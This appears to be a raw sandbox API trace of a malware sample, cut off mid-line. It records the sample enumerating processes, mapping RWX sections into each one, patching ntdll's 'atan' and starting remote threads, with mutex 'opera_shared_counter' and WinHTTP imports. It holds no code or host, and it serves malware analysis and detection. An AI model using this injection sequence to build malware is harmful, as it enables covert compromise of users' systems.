lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0171.576] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0171.577] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.577] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.577] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.577] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0171.577] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.577] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0171.577] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0171.581] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0171.581] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x90000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0171.581] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0171.582] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0171.582] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0171.582] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0171.582] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0171.582] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0171.582] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0171.582] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0171.582] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0171.582] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0171.582] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0171.583] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0171.583] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0171.583] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0171.583] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0171.583] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0171.583] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0171.583] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0171.583] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0171.583] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0171.583] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0171.584] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0171.584] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0080000) returned 0x881f0 [0171.584] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0171.585] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0171.585] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0171.585] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0171.585] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0171.586] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0171.586] GetLastError () returned 0x0 [0171.586] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0171.586] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0171.586] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0171.586] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0171.587] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0171.588] CloseHandle (hObject=0xfc) returned 1 [0171.588] Sleep (dwMilliseconds=0x1f4) [0172.092] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0172.093] CloseHandle (hObject=0xf8) returned 1 [0172.093] CloseHandle (hObject=0xf4) returned 1 [0172.093] CloseHandle (hObject=0xf0) returned 1 [0172.093] CloseHandle (hObject=0xec) returned 1 [0172.093] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0172.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0172.094] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0172.094] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0172.094] CloseHandle (hObject=0xec) returned 1 [0172.094] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0172.094] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0172.094] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0172.094] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.094] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.094] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.094] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0172.094] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.094] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0172.094] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0172.098] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0172.098] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x130000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0172.099] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0172.099] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0172.099] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0172.099] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0172.099] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0172.099] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0172.099] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0172.099] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0172.099] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0172.100] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0172.100] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0172.100] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0172.100] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0172.100] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0172.100] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0172.100] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0172.100] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0172.101] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0172.101] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0172.101] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0172.101] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0172.101] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0172.101] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0172.101] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0172.102] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0172.102] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0172.102] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0172.102] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0172.103] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0172.103] GetLastError () returned 0x0 [0172.103] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0172.103] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0172.103] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0172.103] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0172.104] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0172.105] CloseHandle (hObject=0xfc) returned 1 [0172.105] Sleep (dwMilliseconds=0x1f4) [0172.607] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0172.608] CloseHandle (hObject=0xf8) returned 1 [0172.608] CloseHandle (hObject=0xf4) returned 1 [0172.608] CloseHandle (hObject=0xf0) returned 1 [0172.608] CloseHandle (hObject=0xec) returned 1 [0172.609] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0172.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0172.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0172.609] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0172.609] CloseHandle (hObject=0xec) returned 1 [0172.609] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0172.609] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0172.609] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0172.609] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.609] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.609] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.609] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0172.609] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.610] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0172.610] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0172.614] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0172.614] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xf0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0172.614] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0172.614] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0172.614] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0172.615] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0172.615] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0172.615] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0172.615] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0172.615] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0172.615] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0172.615] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0172.615] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0172.615] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0172.616] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0172.616] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0172.616] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0172.616] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0172.616] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0172.616] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0172.616] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0172.616] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0172.616] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0172.616] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0172.616] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0172.617] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0172.617] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0172.617] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0172.617] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0172.618] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0172.618] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0172.618] GetLastError () returned 0x0 [0172.618] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0172.618] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0172.618] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0172.618] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0172.619] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0172.620] CloseHandle (hObject=0xfc) returned 1 [0172.620] Sleep (dwMilliseconds=0x1f4) [0173.122] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0173.123] CloseHandle (hObject=0xf8) returned 1 [0173.123] CloseHandle (hObject=0xf4) returned 1 [0173.123] CloseHandle (hObject=0xf0) returned 1 [0173.123] CloseHandle (hObject=0xec) returned 1 [0173.123] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0173.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0173.124] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0173.124] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0173.124] CloseHandle (hObject=0xec) returned 1 [0173.124] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0173.124] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0173.124] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0173.124] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.124] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.124] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.124] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0173.124] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.124] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0173.124] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0173.128] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0173.129] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0173.129] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0173.129] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0173.129] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0173.129] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0173.129] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0173.129] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0173.130] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0173.130] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0173.130] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0173.130] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 